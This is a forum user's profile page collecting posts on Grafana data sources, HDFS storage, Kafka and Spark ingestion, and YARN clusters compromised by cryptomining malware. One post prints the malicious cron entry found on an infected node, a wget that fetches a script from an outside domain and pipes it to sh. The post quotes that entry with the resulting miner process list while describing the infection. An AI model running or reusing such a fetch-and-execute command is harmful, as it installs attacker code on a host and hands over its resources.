Member since
06-24-2018
59
Posts
8
Kudos Received
4
Solutions
My Accepted Solutions
Title | Views | Posted |
---|---|---|
9529 | 01-12-2019 05:48 AM | |
16938 | 08-26-2018 10:41 AM | |
6808 | 08-13-2018 05:39 AM | |
5607 | 08-06-2018 07:45 AM |
10-10-2023
10:06 AM
Grafana is a popular open-source platform for monitoring and observability, and it is commonly associated with telemetry data visualization, especially when integrated with time-series databases like Prometheus, InfluxDB, or Elasticsearch. However, Grafana is not limited to telemetry data visualization, and it can be used for a wide range of data sources, including HDFS and Hive tables. Here are some options for using Grafana for data visualization beyond telemetry: Hive Data Sources: Grafana has built-in support for various data sources, and it offers plugins for connecting to databases and data lakes. You can configure Grafana to connect to Hive as a data source and visualize data stored in Hive tables. HDFS Data Sources: While Grafana primarily focuses on time-series data, you can still use it to visualize data stored in HDFS by connecting it to Hadoop-related data sources or by exporting HDFS data to another data store (e.g., Elasticsearch, InfluxDB) that Grafana supports. SQL Databases: Grafana can connect to traditional relational databases using SQL data sources. If you have data stored in SQL databases, you can use Grafana to create dashboards and visualizations. Log Data: Grafana can be used for log data analysis and visualization. You can integrate it with tools like Loki (for log aggregation) and explore log data in dashboards. Custom Plugins: If you have a unique data source or a specific format, you can develop custom data source plugins for Grafana to connect to your data and visualize it as needed. API Data: Grafana supports various data sources that expose data through APIs. You can connect to REST APIs, GraphQL APIs, and other web services to visualize data. Mixed Data Sources: Grafana allows you to create dashboards that combine data from multiple sources, making it versatile for various data visualization needs. While Grafana is flexible and can be used for a wide range of data sources, it's important to consider the nature of your data and the specific visualization requirements. Depending on your use case, you may need to choose the most suitable data source, data format, and visualization options within Grafana to achieve your desired results.
... View more
03-08-2022
05:06 PM
In my case, the below cron entry was found $ sudo -u yarn crontab -l
*/10 * * * * wget http://vbyphnnymdjnsiau.3utilities.com/Bj2yso0 -O-|sh It resulted in so many spurious processes initiated by yarn - and shooting up the CPU. Nothing could be done. In some cases the number of entries were as high as 20k. $ ps -ef | grep yarn
yarn 30321 30318 0 11:44 ? 00:00:00 NHNe5C5iHr
yarn 30323 29152 0 11:44 ? 00:00:00 NHNe5C5iHr
yarn 30330 29075 0 11:44 ? 00:00:00 rxNqqqOesC1HqN
yarn 30427 30319 0 11:44 ? 00:00:00 NHNe5C5iHr
yarn 30773 1 0 10:34 ? 00:00:00 fexsOEvOv
yarn 31186 1 0 10:34 ? 00:00:00 GqOeeG5eCC1rO
yarn 31189 1 0 10:34 ? 00:00:00 ff1NrseqqffTHrve
yarn 31727 1 0 09:20 ? 00:00:00 ivxvj1Ei1
yarn 31731 31727 0 09:20 ? 00:00:04 ivxvj1Ei1
yarn 31770 1 0 09:20 ? 00:00:00 GjN1GxCsqE51fs
yarn 31771 31770 0 09:20 ? 00:00:21 GjN1GxCsqE51fs
yarn 31774 31770 0 09:20 ? 00:00:05 GjN1GxCsqE51fs
yarn 31790 1 0 09:20 ? 00:00:00 EvGeHe5OxfC
yarn 31791 31790 0 09:20 ? 00:00:23 EvGeHe5OxfC
yarn 31793 31790 0 09:20 ? 00:00:02 EvGeHe5OxfC
yarn 31803 1 0 09:20 ? 00:00:00 qCevqvvGff1
yarn 31804 31803 0 09:20 ? 00:00:18 qCevqvvGff1
yarn 31806 31803 0 09:20 ? 00:00:04 qCevqvvGff1
yarn 32243 1 0 10:35 ? 00:00:00 TNsNf5fqTEv5esOxx
yarn 32254 1 0 10:35 ? 00:00:00 qCevqvvGff1
yarn 32255 1 0 10:35 ? 00:00:00 seffjsOExr Thanks for discussing and bringing up this issue.
... View more
02-03-2019
05:09 AM
1 Kudo
Hello, Loading data directly to Kafka without any Service seems unlikely. However, you can use execute a simple kafka console producer to send all your data to the kafka service. But if your requirement is to save data to HDFS you need to include a few more services along with Kafka. For example, Crawlers >> kafka console producer (or) Spark Streaming >> Flume >> HDFS As your requirement is to store the data in HDFS and not stream the data. I suggest you execute a Spark job, it will store your data to HDFS. Refer mentioned commands to execute a spark job to move data to HDFS. Initiate a spark-shell Execute the mentioned command in the Spark shell in the same order. val moveFile = sc.textFile("file:///path/to/Sample.log") moveFile.saveAsTextFile("hdfs:///tmp/Sample.log")
... View more
12-03-2018
09:33 PM
This may be a very basic question but I ask because it is unclear from the data you've posted: Have you accounted for replication? 50 GiB of HDFS file lengths summed up (hdfs dfs -du values) with 3x replication would be ~150 GiB of actual used space on the physical storage. The /dfs/dn is where the file block replicas are stored. Nothing unnecessary is retained in HDFS, however a common overlooked item is older snapshots retaining data blocks that are no longer necessary. Deleting such snapshots frees up the occupied space based on HDFS files deleted after the snapshot was made. If you're unable to grow your cluster, but need to store more data, then you may sacrifice availability of data by lowering your default replication to 2x or 1x (via dfs.replication config for new data writes, and hdfs dfs -setrep n for existing data).
... View more
10-18-2018
06:20 PM
Since I was hit with the mining virus, it would continuously submit the mining procedure to port 8088, so I changed my yarn port to 8089 and solved it
... View more
10-17-2018
01:53 AM
I have posted the answer, in previous reply, can you please be specific? check this post, i replied there. http://community.cloudera.com/t5/Cloudera-Manager-Installation/Yarn-Node-Manager-unexpected-exists-occurring-after/m-p/79048#M14736
... View more
08-26-2018
10:41 AM
3 Kudos
Dr.who issue is very common these days , i am not sure whos exploiting opensource project or sth. but the main cause is usually a remote shell script would be attached to your resource manager node which cause dr.who to spawn. you dont need to kerberize just use some linux firewall Thanks
... View more
08-15-2018
11:51 PM
Can you please share logs ? plus share screen of that particular hosts. Thanks
... View more